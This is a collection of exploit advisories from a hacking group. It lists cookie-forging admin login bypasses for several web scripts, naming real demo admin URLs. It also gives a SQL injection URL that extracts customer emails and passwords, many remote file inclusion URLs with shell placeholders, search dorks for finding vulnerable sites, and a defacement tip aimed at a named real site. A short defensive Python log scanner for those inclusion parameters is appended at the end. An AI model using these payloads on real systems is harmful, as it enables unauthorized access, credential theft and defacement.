------------------------------------------------------------------------
RSS Feeds URL portal site (Cookie) Login Bypass Vulnerability
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts       : RSS Feeds URL portal site
Scripts site  : http://buymyscripts.net/
Discovered By : k1n9k0ng
My Site       : http://www.sekuritionline.net
IRC Channel   : #sekuritionline
Special To    : adhietslank, cyberlog, cah_gemblunkz, jayoes, thesims, setiawan, fl3xu5, k1tk4t
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Demo Site     : http://rss.buymyscripts.net/
Demo Admin    : http://rss.buymyscripts.net/admin/

Exploit:
javascript:document.cookie = "username=test; path=/admin/";
javascript:document.cookie = "password=test; path=/admin/";
------------------------------------------------------------------------

------------------------------------------------------------------------
Lyrics Script (Cookie) Login Bypass Vulnerability
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts       : Lyrics Script
Scripts site  : http://buymyscripts.net/
Discovered By : k1n9k0ng
My Site       : http://www.sekuritionline.net
IRC Channel   : #sekuritionline
Special To    : adhietslank, cyberlog, cah_gemblunkz, jayoes, thesims, setiawan, fl3xu5, k1tk4t
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Demo Site     : http://goodlyrics.org/
Demo Admin    : http://goodlyrics.org/admin/

Exploit:
javascript:document.cookie = "username=test; path=/admin/";
javascript:document.cookie = "password=test; path=/admin/";
------------------------------------------------------------------------

------------------------------------------------------------------------
Membership Site Script (Cookie) Login Bypass Vulnerability
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts       : Membership Site Script
Scripts site  : http://buymyscripts.net/
Discovered By : k1n9k0ng
My Site       : http://www.sekuritionline.net
IRC Channel   : #sekuritionline
Special To    : adhietslank, cyberlog, cah_gemblunkz, jayoes, thesims, setiawan, fl3xu5, k1tk4t
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Demo Site     : http://membership.buymyscripts.net/
Demo Admin    : http://membership.buymyscripts.net/admin/

Exploit:
javascript:document.cookie = "username=test; path=/admin/";
javascript:document.cookie = "password=test; path=/admin/";
------------------------------------------------------------------------

------------------------------------------------------------------------
Recipe website script (Cookie) Login Bypass Vulnerability
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts       : Recipe website script
Scripts site  : http://buymyscripts.net/
Discovered By : k1n9k0ng
My Site       : http://www.sekuritionline.net
IRC Channel   : #sekuritionline
Special To    : adhietslank, cyberlog, cah_gemblunkz, jayoes, thesims, setiawan, fl3xu5, k1tk4t
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Demo Site     : http://www.tasty-recipes.org/
Demo Admin    : http://www.tasty-recipes.org/admin/

Exploit:
javascript:document.cookie = "username=test; path=/admin/";
javascript:document.cookie = "password=test; path=/admin/";
------------------------------------------------------------------------

------------------------------------------------------------------------
Hotscripts.com clone script (Cookie) Login Bypass Vulnerability
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts       : Hotscripts.com clone script
Scripts site  : http://buymyscripts.net/
Discovered By : k1n9k0ng
My Site       : http://www.sekuritionline.net
IRC Channel   : #sekuritionline
Special To    : adhietslank, cyberlog, cah_gemblunkz, jayoes, thesims, setiawan, fl3xu5, k1tk4t
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Demo Site     : http://hotscripts.buymyscripts.net/
Demo Admin    : http://hotscripts.buymyscripts.net/admin/

Exploit:
javascript:document.cookie = "username=test; path=/admin/";
javascript:document.cookie = "password=test; path=/admin/";
------------------------------------------------------------------------

------------------------------------------------------------------------
e-Book Store web site script (Cookie) Login Bypass Vulnerability
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts       : e-Book Store web site script
Scripts site  : http://buymyscripts.net/
Discovered By : k1n9k0ng
My Site       : http://www.sekuritionline.net
IRC Channel   : #sekuritionline
Special To    : adhietslank, cyberlog, cah_gemblunkz, jayoes, thesims, setiawan, fl3xu5, k1tk4t
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Demo Site     : http://ebook.buymyscripts.net/
Demo Admin    : http://ebook.buymyscripts.net/admin/

Exploit:
javascript:document.cookie = "username=test; path=/admin/";
javascript:document.cookie = "password=test; path=/admin/";
------------------------------------------------------------------------

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts       : Script Toko Online Vs.5.01
Scripts site  : http://www.gempar.com/
Discovered By : k1n9k0ng
My Site       : http://www.sekuritionline.net
IRC Channel   : #sekuritionline
Special To    : adhietslank, cyberlog, cah_gemblunkz, jayoes, thesims, setiawan, fl3xu5, k1tk4t
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Demo Site     : http://www.gempar.com/demotoko/

Bug Found:
http://www.gempar.com/demotoko/shop_display_products.php?cat_id=-1 union select concat(email,0x3a,password),1,2,3,4,5,6,7 from naxtor_cart_store_customer/*

# milw0rm.com [2009-01-26]
========================================================================

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts         : Harris Wap Chat
Discovered By   : k1n9k0ng
Scripts site    : http://www.successkid.com/
Download Script : http://www.successkid.com/blogs/?p=2
Thanks To       : #sekuritionline, #semprol, #bajingan, #mimid, #yogyafree
Special To      : adhietslank, sukam, cyberlog, cah_gemblunkz, the_sims, aRiee letjen, k1tk4t, inouf and jayoes
Site            : www.sekuritionline.net
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Demo Site       : http://successkid.com/wapchat/itdiv.php

Bug Found:
http://www.site.com/wapchat/src/eng.writeMsg.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.adCreate.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.adCreateSave.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.adDispByTypeOptions.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.createRoom.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.forward.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.pageLogout.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.resultMember.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.roomDeleteConfirm.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.saveNewRoom.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.searchMember.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.writeMsg.php?sysFileDir=[shell]
========================================================================

# milw0rm.com [2008-04-30]

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts       : vcart version 3.3.2
Discovered By : k1n9k0ng
Scripts site  : http://www.visionburst.com/
Thanks To     : #sekuritionline, #semprol, #bajingan, #mimid, #r.i.p, #x-code, #yogyafree
special To    : adhietslank, sukam, cyberlog, cah_gemblunkz, the_sims, aRiee, letjen, k1tk4t
site          : www.sekuritionline.net
dork          : Powered by "vcart 3.3.2"
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

bug found:
"http://www.site.net/index.php?abs_path=[shell]"
"http://www.site.net/checkout.php?abs_path=[shell]"

# milw0rm.com [2008-01-11]
========================================================================

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts       : MOSMediaLite451
Discovered By : k1n9k0ng
Scripts site  : http://www.djoomla.com/component/option,com_remository/Itemid,2/func,fileinfo/id,104/
Thanks To     : #sekuritionline, #semprol, #bajingan, #mimid, #r.i.p, #x-code, #yogyafree
special To    : adhietslank, babypunk, cyberlog, cah_gemblunkz, the_sims, ARiee, letjen, k1tk4t
site          : www.sekuritionline.net
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

bug Script:
include_once( $mosConfig_absolute_path . "/administrator/components/com_mosmedia/mosmedia.config.php" );

bug found:
"http://www.site.net/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=[shell]"
"http://www.site.net/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=[shell]"
"http://www.site.net/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=[shell]"
"http://www.site.net/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=[shell]"
"http://www.site.net/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=[shell]"
"http://www.site.net/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=[shell]"

# milw0rm.com [2007-10-08]
========================================================================

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts       : Ncaster 1.7.2
Discovered By : k1n9k0ng
Scripts site  : http://ncastercms.com/downloads/ncaster172.zip
Thanks To     : #sekuritionline, #semprol, #mimid, #r.i.p, #x-code, #yogyafree
special To    : adhietslank, babypunk, bugs_, cyberlog, cah_gemblunkz
site          : www.sekuritionline.net
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

bug Script:
require("$adminfolder/sources/datelib.php");

bug found:
"http://www.site.net/ncaster/admin/addons/archive/archive.php?adminfolder=[shell]"

# milw0rm.com [2007-08-09]
========================================================================

fishcart_v3 (fc_example.php) Remote File Include Vulnerability
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts       : fishcart_v3
Discovered By : k1n9k0ng
Scripts site  : http://fishcart.org/fc_installer_snap_2007_08_03.zip
                http://fishcart.org/fishcart_snap_2007_08_03
                http://fishcart.org/fishcart_snap_2007_08_03.tgz
Thanks To     : #sekuritionline, #semprol, #mimid, #r.i.p, #x-code, #yogyafree
special To    : adhietslank, babypunk, bugs_, cyberlog, cah_gemblunkz
site          : www.sekuritionline.net
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

bug Script:

bug found:
"/fishcart_v3/fc_functions/fc_example.php?docroot=[shell]"

# milw0rm.com [2007-08-08]
========================================================================

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts         : CMS Jamroom Version: 3.3.5
Discovered By   : Cyberlog
Scripts site    : http://www.jamroom.net/
Download Script : http://www.jamroom.net/index.php?m=td_download&o=download&file_id=43
Thanks To       : #sekuritionline, #semprol, #bajingan, #mimid, #yogyafree
Special To      : k1n9k0ng, adhietslank, sukam, cah_gemblunkz, the_sims, aRiee letjen, k1tk4t, inouf and jayoes
Site            : www.sekuritionline.net
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

bug Script:
require_once("{$jamroom['jm_dir']}/include/jamroom-payment.inc.php");

Bug Found:
http://www.site.com/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=[shell]

# milw0rm.com [2008-06-20]
========================================================================

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts       : CMS joomla
Discovered By : k1n9k0ng
Thanks To     : #sekuritionline, #semprol, #bajingan, #mimid, #yogyafree
Special To    : Cyberlog, adhietslank, sukam, cah_gemblunkz, the_sims, aRiee letjen, k1tk4t, inouf and jayoes
Site          : www.sekuritionline.net

I found a bug in the Joomla/Mambo component com_booklibrary. You can search Google with the key:
allinurl:"index.php?option=com_booklibrary"

Example site:
http://www.gc-upa.de/index.php?option=com_booklibrary&task=view&catid=&id=3&Itemid=79

You can change the comment on that site with an HTML script.

Example HTML script:

Hacked by

www.sekuritionline.net

=========================================================================
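
A defender-side check for the remote file include advisories above, added here as an example and not part of the original advisories: it scans web access log lines for the include-path parameters those advisories name and flags values that begin with a URL scheme. The combined log format, the sample log lines and the hostnames are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Include-path parameters named in the advisories above.
RFI_PARAMS = {"sysFileDir", "abs_path", "mosConfig_absolute_path",
              "adminfolder", "docroot", "jamroom[jm_dir]"}
# A value that begins with a URL scheme or stream wrapper would make the
# include resolve to a remote or injected resource, not a local directory.
REMOTE_VALUE = re.compile(r"\s*(?:(?:https?|ftps?|php|expect)://|data:)", re.I)
# Request field of the common/combined access log format (assumed here).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation addresses and hostnames).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] '
    '"GET /index.php?abs_path=http%3A%2F%2Ffiles.example%2Fa.txt%3F HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] '
    '"GET /fishcart_v3/fc_functions/fc_example.php?docroot=/var/www/shop HTTP/1.1" 200 734',
    '192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] '
    '"GET /include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=ftp://files.example/b HTTP/1.1" 200 0',
    '192.0.2.13 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?page=2 HTTP/1.1" 200 901',
]

def find_rfi_attempts(log_lines):
    """Return (line_number, parameter, decoded_value) for each suspicious request."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue  # not a request line in the assumed format
        query = urlsplit(match.group(1)).query
        # parse_qsl percent-decodes names and values, so encoded brackets
        # (%5B, %5D) and encoded schemes are normalised before matching.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name in RFI_PARAMS and REMOTE_VALUE.match(value):
                hits.append((number, name, value))
    return hits

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

An access log records only the query string, so the same parameter names arriving in a request body or cookie need an application-level or WAF check instead.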